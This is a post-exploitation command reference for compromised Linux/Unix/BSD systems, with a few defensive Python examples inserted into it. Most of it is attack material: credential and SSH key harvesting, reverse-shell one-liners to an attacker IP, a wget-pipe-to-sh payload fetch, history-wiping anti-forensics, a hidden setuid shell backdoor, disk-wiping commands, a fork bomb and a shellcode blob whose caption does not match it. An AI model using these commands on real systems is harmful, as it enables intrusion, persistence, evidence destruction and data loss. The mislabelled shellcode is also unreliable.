Linux-Unix-BSD Post Exploitation Command List

The document provides a list of commands for Linux/Unix/BSD post-exploitation organized into categories such as "Information", "System", "Networking", "User accounts", "Credentials", "Configs", and "Escalating privileges". It contains over 100 individual commands and their descriptions or purposes for obtaining information from and maintaining access on a compromised system. The document also provides tips for covering tracks and avoiding history logs.

Linux/Unix/BSD Post Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact [email protected]
You can download these files in any format using Google Docs File > Download As method
If you are viewing this on anything other than Google Docs, you can get access to the latest links to the Linux/Unix/BSD, OSX, Obscure, Metasploit, and Windows docs here: http://bit.ly/nuc0N0
DISCLAIMER: Anyone can edit these docs, and all that entails and implies

Linux/Unix/BSD Post Exploitation Command List Page: 1

Table of Contents
Table of Contents
Information
Blind Files
System
Networking
User accounts
Credentials
Configs
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history files
Obtain users information
Escalating
Looking for possible opened paths
Maintaining control
Reverse Shell
Fun if Windows is present and accessible
Stuff to be sorted
Deleting and Destroying
Execute a remote script
Fork Bomb


Information
Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal (Don't forget %00!)
File
    Contents and Reason

/etc/resolv.conf
    Contains the current nameservers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd

/etc/motd
    Message of the Day.

/etc/issue
    Debian current version of distro

/etc/passwd
    List of local users

/etc/shadow
    List of users' password hashes (requires root)

/home/xxx/.bash_history
    Will give you some directory context

System
Command
    Description and/or Reason

uname -a
    Prints the kernel version, arch, sometimes distro, ...

ps aux
    List all running processes

top -n 1 -d
    Print process, 1 is a number of lines

id
    Your current username, groups

arch, uname -m
    Kernel processor architecture

w
    who is connected, uptime and load avg

who -a
    uptime, runlevel, tty, processes etc.

gcc -v
    Returns the version of GCC.

mysql --version
    Returns the version of MySQL.

perl -v
    Returns the version of Perl.

ruby -v
    Returns the version of Ruby.

python --version
    Returns the version of Python.

df -k
    mounted fs, size, % use, dev and mountpoint

mount
    mounted fs

last -a
    Last users logged on

lastcomm
lastlog
lastlogin (BSD)

getenforce
    Get the status of SELinux (Enforcing, Permissive or Disabled)

dmesg
    Information from the last system boot

lspci
    prints all PCI buses and devices

lsusb
    prints all USB buses and devices

lscpu
    prints CPU information

lshw
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
    (note: can cause heavy disk i/o)

which nmap
    locate a command (ie nmap or nc)

locate bin/nmap
locate bin/nc

jps -l
java -version
    Returns the version of Java.

Networking
hostname -f
ip addr show
ip ro show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n -v
iptables -t nat -L -n -v
ip6tables -L -n -v
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi
to resume it: cat /proc/net/* (more discreet)
what does the above mean? > It means that all the information given by the above commands can be found by looking into the files under /proc/net, and that this approach is less likely to trigger monitoring or other stuff.

User accounts

local accounts: cat /etc/passwd
password hashes in /etc/shadow on Linux
password hashes in /etc/security/passwd on AIX
groups in /etc/group (and/or /etc/gshadow on Linux)
all accounts: getent passwd
should dump local, LDAP, NIS, whatever the system is using
same with getent group
Samba's own database: pdbedit -L -w or pdbedit -L -v
privileged accounts: cat
(above: cat ???)
mail aliases: cat /etc/aliases, find /etc -name aliases*, getent aliases
NIS accounts: ypcat passwd displays NIS password file
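The account-listing commands above are also what an auditor reads back when checking whether a password file has been tampered with. The following Python script is an added example, not part of the original document: it parses passwd(5)-format text and flags the conditions a reviewer looks for (a second UID-0 account, an empty password field, a hash kept in the world-readable passwd instead of /etc/shadow, duplicate or malformed entries). The sample text is constructed; on a real host call `audit_passwd(open("/etc/passwd").read())`.

```python
from dataclasses import dataclass

# Constructed sample in passwd(5) format (not taken from any real host).
# "backup" is a planted second UID-0 account and "svc" has an empty
# password field, i.e. no password is required to log in.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:0:0:backup:/var/backups:/bin/sh
svc::1001:1001:service:/srv/svc:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "account locked".
PLACEHOLDER_PW = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    user: str
    reason: str


def parse_passwd(text):
    """Split passwd(5) text into per-account dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"name": line, "line": lineno, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell,
                        "line": lineno, "malformed": False})
    return entries


def audit_passwd(text):
    """Return Findings for the tampering signs a reviewer checks in a passwd file."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(Finding(e["name"], "malformed line (expected 7 colon-separated fields)"))
            continue
        if e["name"] in seen:
            findings.append(Finding(e["name"], "duplicate username"))
        seen.add(e["name"])
        if not e["uid"].isdigit():
            findings.append(Finding(e["name"], "non-numeric UID"))
        elif int(e["uid"]) == 0 and e["name"] != "root":
            findings.append(Finding(e["name"], "UID 0 account that is not root"))
        if e["pw"] == "":
            findings.append(Finding(e["name"], "empty password field (login without a password)"))
        elif e["pw"] not in PLACEHOLDER_PW and not e["pw"].startswith("!"):
            findings.append(Finding(e["name"], "password hash stored in world-readable passwd instead of shadow"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.reason}")
```

The same parser works on `getent passwd` output, which is the better input on LDAP or NIS hosts because it covers every account source the system actually consults.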

Credentials

SSH keys, often passwordless: /home/*/.ssh/id*
SSH agent:

Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
PGP keys: /home/*/.gnupg/secring.gpg

Configs

ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

lsb_release -d                                   # Generic command for all LSB distros
/etc/os-release                                  # Generic for distros using systemd
/etc/issue                                       # Generic but often modified
cat /etc/*release

/etc/SUSE-release                                # Novell SUSE
/etc/redhat-release, /etc/redhat_version         # RedHat
/etc/fedora-release                              # Fedora
/etc/slackware-release, /etc/slackware-version   # Slackware
/etc/debian_release, /etc/debian_version         # Debian
/etc/mandrake-release                            # Mandrake
/etc/sun-release                                 # Sun JDS
/etc/release                                     # Solaris/Sparc
/etc/gentoo-release                              # Gentoo
/etc/arch-release                                # Arch Linux (file will be empty)
arch                                             # OpenBSD sample: OpenBSD.amd64
uname -a                                         # often hints at it pretty well
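Added example (mine, not from the document): a parser for the /etc/os-release format that the "Generic for distros using systemd" entry refers to. The file holds shell-style KEY=value lines; values may be double- or single-quoted, and inside double quotes the characters `\`, `"`, `$` and `` ` `` may be backslash-escaped. The sample content is constructed; `read_os_release()` reads the real file, trying /etc/os-release first and then /usr/lib/os-release, which is the lookup order the format's specification prescribes.

```python
import os
import re

# Constructed sample in os-release format (not copied from a real system).
SAMPLE_OS_RELEASE = r'''
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
ID=debian
# comment lines and blank lines are ignored
PRETTY_NAME='Debian GNU/Linux 12 (bookworm)'
HOME_URL="https://www.debian.org/"
ANSI_COLOR="1;31"
ESCAPED="quote \" dollar \$ backslash \\"
'''

KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
ESCAPABLE = {'"', "\\", "$", "`"}


def _unescape(value):
    """Resolve the backslash escapes allowed in double-quoted os-release values."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value) and value[i + 1] in ESCAPABLE:
            out.append(value[i + 1])
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def parse_os_release(text):
    """Parse os-release text into a dict; comments and malformed lines are skipped."""
    data = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if not KEY_RE.fullmatch(key):
            continue
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            quote, value = value[0], value[1:-1]
            if quote == '"':            # single-quoted values carry no escapes
                value = _unescape(value)
        else:
            value = _unescape(value)
        data[key] = value
    return data


def describe_distro(data):
    """PRETTY_NAME if present, else NAME plus VERSION_ID (NAME defaults to "Linux" per the spec)."""
    if data.get("PRETTY_NAME"):
        return data["PRETTY_NAME"]
    return " ".join(p for p in (data.get("NAME", "Linux"), data.get("VERSION_ID", "")) if p)


def read_os_release(paths=("/etc/os-release", "/usr/lib/os-release")):
    """Read the first os-release file that exists; {} if the host has none (e.g. BSD)."""
    for path in paths:
        if os.path.isfile(path):
            with open(path, encoding="utf-8") as fh:
                return parse_os_release(fh.read())
    return {}


if __name__ == "__main__":
    live = read_os_release()
    print(describe_distro(live) if live else "no os-release file on this host")
```

On a BSD or an old distribution `read_os_release()` returns an empty dict, which is the cue to fall back to the per-distro release files and `uname -a` listed above.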

Installed Packages

rpm -qa --last | head
yum list | grep installed
Debian:
dpkg -l
dpkg -l | grep -i linux-image
dpkg --get-selections
{Free,Net}BSD:
pkg_info
Solaris:
pkginfo
Gentoo:
# equery must be installed
cd /var/db/pkg/ && ls -d */*   # always works
Arch Linux:
pacman -Q

Package Sources

cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf

Finding Important Files

ls -dlR */ #
ls -alR | grep ^d
find /var -type d
ls -dl `find /var -type d`
ls -dl `find /var -type d` | grep -v root
find /var ! -user root -type d -ls

find /var/log -type f -exec ls -la {} \;
find / -perm -4000 (find all suid files)

ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree; ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$ # Remember to updatedb before running locate
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | sed 's/:/ /g'` -perm /6000 -ls # find suids
locate rhosts

Covering Your Tracks
Avoiding history files

export HISTFILE=
or
unset HISTFILE
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:
However, if you happen to be on an account that was originally inaccessible, and the .bash_history file is available (ls -a ~), viewing/cat'ing its contents can provide you with a good deal of information about the system and its most recent updates/changes.
clear all history in ram
history -c
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
touch ~/.bash_history (invasive)
<space>history -c (using a space before a command)
zsh% unset HISTFILE HISTSIZE
tcsh% set history=0
bash$ set +o history
ksh$ unset HISTFILE
find / -type f -exec {} (forensics nightmare)
Note that you're probably better off modifying or temporarily disabling rather than deleting history files; it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$'ing the shell. Sometimes the shell can be configured to run history -w after every command; get around this by overriding history with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.

Obtain users information

ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist* # you can learn a lot from this
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history

Escalating
Looking for possible opened paths

ls -alh /root/
sudo -l
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi

ls /home/*/.ssh/*

Maintaining control

Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.)
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note: need -l on some versions, and many does NOT support -e anymore
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
xterm -display 10.0.0.1:1
Listener: Xnest :1
Add permission to connect: xhost +victimIP
ssh -N -R 3333:localhost:22 user@yourhost
nc -e /bin/sh 10.0.0.1 1234
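Every one-liner above ends in a shell whose standard input, output and error are the network socket (or, in the mkfifo variant, pipes that feed nc). On Linux that shape is visible in /proc/<pid>/fd: descriptors 0, 1 and 2 resolve to socket:[inode] instead of a tty, /dev/null or a pipe. The following Python is an added example, not part of the original document: `socket_backed_stdio()` scans a snapshot of that form and `snapshot_from_proc()` builds the snapshot from a live /proc (processes that cannot be inspected are skipped, so run it as root for full coverage). The sample snapshot is constructed. Services spawned by inetd legitimately run with socket stdio, so hits are leads to correlate with the inetd.conf check in the Configs section, not verdicts; the mkfifo-plus-nc variant leaves the shell with pipes only, so `socket_inodes_in_use()` is there to tie a socket inode back to the nc process that holds it (the inode column of /proc/net/tcp or `ss -p` output).

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

# Constructed snapshot: {pid: (comm, {fd: readlink target})}, shaped like
# what /proc/<pid>/comm and readlink on /proc/<pid>/fd/* would give.
SAMPLE_SNAPSHOT = {
    1:    ("systemd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    2140: ("sshd",    {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[18801]"}),
    3175: ("bash",    {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    # perl/php/ruby/python one-liner shape: all three stdio fds dup'd onto one socket
    4022: ("sh",      {0: "socket:[24410]", 1: "socket:[24410]", 2: "socket:[24410]"}),
    # mkfifo variant: the shell only sees pipes, nc holds the socket on fd 3
    4023: ("sh",      {0: "pipe:[24450]", 1: "pipe:[24451]", 2: "pipe:[24451]"}),
    4024: ("nc",      {0: "pipe:[24451]", 1: "pipe:[24450]", 2: "/dev/pts/1", 3: "socket:[24470]"}),
}


def socket_backed_stdio(snapshot):
    """Return processes whose stdin/stdout/stderr are sockets, most suspicious first."""
    hits = []
    for pid, (comm, fds) in snapshot.items():
        sock_fds = [fd for fd in (0, 1, 2) if fd in fds and SOCKET_RE.match(fds[fd])]
        if not sock_fds:
            continue
        inodes = sorted({SOCKET_RE.match(fds[fd]).group(1) for fd in sock_fds})
        hits.append({"pid": pid, "comm": comm, "socket_fds": sock_fds, "inodes": inodes})
    # all three fds on a socket is the classic interactive reverse-shell shape
    hits.sort(key=lambda h: (-len(h["socket_fds"]), h["pid"]))
    return hits


def socket_inodes_in_use(snapshot):
    """Map socket inode -> set of pids holding it, to join against /proc/net/tcp or ss -p."""
    owners = {}
    for pid, (_, fds) in snapshot.items():
        for target in fds.values():
            m = SOCKET_RE.match(target)
            if m:
                owners.setdefault(m.group(1), set()).add(pid)
    return owners


def snapshot_from_proc(proc="/proc"):
    """Build a {pid: (comm, {fd: target})} snapshot from a live procfs."""
    snap = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        base = os.path.join(proc, name)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            fds = {}
            for fd in os.listdir(os.path.join(base, "fd")):
                try:
                    fds[int(fd)] = os.readlink(os.path.join(base, "fd", fd))
                except OSError:
                    pass  # fd closed between listdir and readlink
        except OSError:
            continue  # process exited, or not inspectable without root
        snap[int(name)] = (comm, fds)
    return snap


if __name__ == "__main__":
    for h in socket_backed_stdio(snapshot_from_proc()):
        print(f"pid {h['pid']} ({h['comm']}): stdio fds {h['socket_fds']} on socket inode(s) {h['inodes']}")
```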

Fun if Windows is present and accessible
If Windows is installed and the logged-in user's access level includes the Windows partitions, an attacker can mount them and do much deeper information gathering, credential theft and rooting. Ntfs-3g is useful for mounting ntfs partitions read-write.
TODO: insert details on what to look for

Stuff to be sorted
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
Command
    Output

ps aux
    List of running processes

id
    List current user and group along with user/group id

w
    Show info about who is logged, what are they doing

who -a
    Print information about users

cat /dev/core > /dev/audio
    Makes a sound from the memory content.
    Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)

cat /dev/mem > /dev/audio

sudo -p
    allows the user to define what the password prompt will be (useful for fun customization with aliases or shell scripts)

Deleting and Destroying
(If it is necessary to leave the machine inaccessible or unusable)
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
Oh, and you're probably a jerk if you use any of the stuff below.

Command
    Description

rm -rf /
    This will recursively try to delete all files.

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond
    Hex version of rm -rf /
    How is this supposed to work?

mkfs.ext3 /dev/sda
    Reformat the device mentioned, making recovery of files hard.

dd if=/dev/zero of=/dev/sda bs=1M
    Overwrite disk /dev/sda with zeros

Execute a remote script
wget http://server/file.sh -O - | sh
    This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shit

Fork Bomb
:(){ :|:& };:

    The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.

Stolen from: http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf

World writable directories
    Find world writable folders outside your home directory. It would be a tremendous success if we could write, say to /etc. So we could add configuration files and therefore pretty sure execute code as root, since many daemons read a specific number of primary and secondary configuration files, whereas the secondary ones are often not created yet. If the superuser's home (/root) would be writable, we could create shell startup files that doesn't exist yet: .profile, .bash_profile, .bashrc...
    find / \( -wholename '/home/homedir/*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null

World writable files
    What if /etc/passwd would be writable? Yeah, we just could add another root user and we would have won! Whereas the foregoing scenario is just too good to be true, it really makes sense to search for world writable files outside your own territory (= your home directory).
    find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Log files
    Sometimes a security unaware administrator chmods a sensitive log file, because he couldn't view it and therefore leaks potentially sensitive data such as passwords or other important information.
    find /var/log -type f -perm -0004 2>/dev/null

Setuid/setgid files
    We already examined fully why setuid and setgid files are worth to be double checked. Such a file owned by root and susceptible for attacks is a big weakness.
    find / \( -type f -or -type d \) -perm -6000 2>/dev/null